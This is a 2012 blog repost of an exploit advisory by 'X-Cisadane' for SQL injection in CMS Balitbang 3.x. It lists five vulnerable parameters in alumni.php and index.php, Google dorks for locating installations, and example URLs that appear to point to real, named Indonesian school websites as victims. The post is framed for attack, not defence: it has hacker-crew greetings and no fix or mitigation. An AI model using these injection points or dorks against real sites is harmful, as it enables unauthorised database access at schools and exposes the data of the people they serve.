Wednesday, October 10, 2012

CMS Balitbang 3.x SQL Injection Vulnerability

CMS Balitbang 3.x SQL Injection Vulnerability

=========================================================================

CMS Balitbang 3.x SQL Injection Vulnerability



=========================================================================





:-----------------------------------------------------------

--------------------------------------------------------------:



: # Exploit Title : CMS Balitbang 3.x SQL Injection Vulnerability

: # Date : 21 November 2011



: # Author : X-Cisadane

: # Software Link : http://adf.ly/DYZ65



: # Version : 3.x

: # Category : Web Applications



: # Vulnerability : SQL Injection

: # Tested On : Google Chrome 14.0.835 (Windows)



: # Dorks : inurl:alumni.php?id=data&tahun&hal= OR inurl:index.php?

id=lih_buku&hal=



: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane,

Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari



:-----------------------------------------------------------

--------------------------------------------------------------:



POC :



SQL Injection Vulnerability :



- Open Victim Website : http://<site>/<CMS Balitbang Installation

Path>/alumni.php?id=data&tahun&hal='[SQL]



- Open Victim Website : http://<site>/<CMS Balitbang Installation

Path>/index.php?id=lih_buku&hal='[SQL]



- Open Victim Website : http://<site>/<CMS Balitbang Installation

Path>/index.php?id=artikel&hal='[SQL]



- Open Victim Website : http://<site>/<CMS Balitbang Installation

Path>/index.php?id=album&hal='[SQL]



- Open Victim Website : http://<site>/<CMS Balitbang Installation

Path>/index.php?id=berita&hal='[SQL]



Example :



http://www.sman1kotabaru.sch.id/html/alu...hun&hal='2

http://www.kajianwebsite.org/html/index....uku&hal='2



http://www.sman3kotasukabumi.sch.id/html...kel&hal='1

http://smpn6banjarmasin.sch.id/html/inde...bum&hal='2

http://sman7-bpp.sch.id/html/index.php?id=berita&hal='1

0 komentar:

Post a Comment